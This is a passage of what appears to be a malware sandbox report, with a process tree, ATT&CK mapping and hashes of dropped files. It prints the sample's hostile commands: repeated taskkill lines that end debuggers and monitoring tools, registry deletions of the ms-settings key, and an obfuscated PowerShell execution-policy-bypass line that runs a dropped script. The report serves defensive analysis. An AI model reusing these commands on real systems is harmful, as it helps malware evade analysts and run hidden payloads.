        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4972
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1860
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3252
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1600
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1608
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:3016
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4448
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:5004
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3452
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1064
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:5084
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1948
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:2608
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4668
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3428
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4800
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3704
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:996
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2340
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4536
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4808
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2560
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1132
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:412
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\.alecar\ /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:3608
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" delete HKCU\Software\Classes\ms-settings\ /f
    3⤵
    - Modifies registry class
    - Modifies registry key
    PID:2320
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start C:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
      C:/ProgramData/Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas
      4⤵
      Executes dropped EXE
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:2112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe
        
        PoWeRsHeLl Remove-Item C:/ProgramData/SecureConnectionTunnel.ps1
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4424
    - - C:\ProgramData\DefendSecurity\SystemSettings.Security
        
        C:\ProgramData\DefendSecurity\SystemSettings.Security -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk')}"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4888

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3184

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4672
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Music\SystemProcessHost.SystemProcesses
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:396

C:\Users\Public\Music\SystemProcessHost.SystemProcesses.exe
"C:\Users\Public\Music\SystemProcessHost.SystemProcesses.exe"
1⤵
- Executes dropped EXE
PID:2804

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\VipPassword.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4712

C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe
"C:\ProgramData\Servis_Framework3511JusU7DH87g2wWTW8l8sgH3E1KIbrDlMX2o838AIwKZ6mxVcjH4.databas.exe"
1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHeLl.exe
  PoWeRsHeLl Remove-Item C:/ProgramData/SecureConnectionTunnel.ps1
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1032
- C:\ProgramData\DefendSecurity\SystemSettings.Security
  C:\ProgramData\DefendSecurity\SystemSettings.Security -ExEc Bypass -Command "& {&('i'+'ex') (gc -Raw -Path 'C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk')}"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3428

C:\ProgramData\DefendSecurity\SystemSettings.Security.exe
"C:\ProgramData\DefendSecurity\SystemSettings.Security.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4208

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DefendSecurity\SystemSettings.Security

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\ProgramData\VipPassword.txt

Filesize
21B

MD5
025f05f1bfe43214b5b56139a528db2b

SHA1
6aac59ae2b474aedd4773c170d2a4685a0aee65d

SHA256
7e3b7a5ee2f8b0bb96d2e729b7e58b06645191b9b9d550db5fa1937fa9aa6b13

SHA512
a2e72695f2094e43a99991557b381f9d8d9e7252173a1792002f530b4e87e92e37b53edcafb2d9d024f81a223ec3f5457aeb1f5cf70cf5fe3fe9ad71f49bd561

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemSettings.Security.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
936B

MD5
1d579e6ee8e4e2235f19853cb414ed06

SHA1
bddc3768f6bae40416dab3400ba8717d0a5b0749

SHA256
c78def9996a956bdc57f9c165b1eeaba75ac25a80ee069087edcb61a2afac820

SHA512
f23a382f809786a825f71508b1b86f6c6db802f5982249323a4208d8301e4e593ed01e3291a763ebeaf025829e828005ed3dfd2460df8c46f3ff95e641c44aa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
33a5582d19d967ee5af5e4faf5b470cd

SHA1
232581ae8550d0bd670e409610aeb831f7d95a08

SHA256
47540bf52bad88f132411bc67d473caecedc3bf329434f006b54710492019405

SHA512
cf064ede82004ac51abfbd9190cf77d3c71438ec3d6759b50e9cb33a18c4ebe79c450bcbf083427dac31cafcf10a366e92c9496cc24ef92e8680cedf4f230d1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7482b92b6453d84869e4a87c00ee0600

SHA1
bb675585a72f659c1dc8518916ee1ce7635dea64

SHA256
6f899f24bd42ee33c3b83fbc16d9396eac7455f45bcd24949e746efc48b46e18

SHA512
bd44183d14dd371ecd6afff9c1d04d43dd77246de4178b61579a9754a04620e4f8d6b833f28919072dc3cad222f6866658f9f08e225c195abca9d9e196b0725a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aylbjt02.0fj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\SystemProcessHost.SystemProcesses

Filesize
537KB

MD5
461f29adf1c3ec76588235194e13bdcd

SHA1
76cf092bf81a01d0709ba1efa66b9e5907315305

SHA256
f234befba70f313b7ff602c9b4fd52eedc05d5ef316967c1554a497b3f62f612

SHA512
be294ccef508ff3745d3641d37c95f159a2aed5072fa0266573335b83aa4e4f2f293f71b5203e8c38a0f206816723905a3f7f192ec2e7778767e8d8eead99451

Download Submit
C:\pRogRaMdatA\lH6gEw462770nr1F7u0UreGjd00tSTq06Bu1TNUVU8DHmb4TtL9TmS7H2.brk

Filesize
73KB

MD5
47b2f35c5fc5395e4926b4bf47739c57

SHA1
e02646b382b384ef9815a4a0af8347246e34e8ce

SHA256
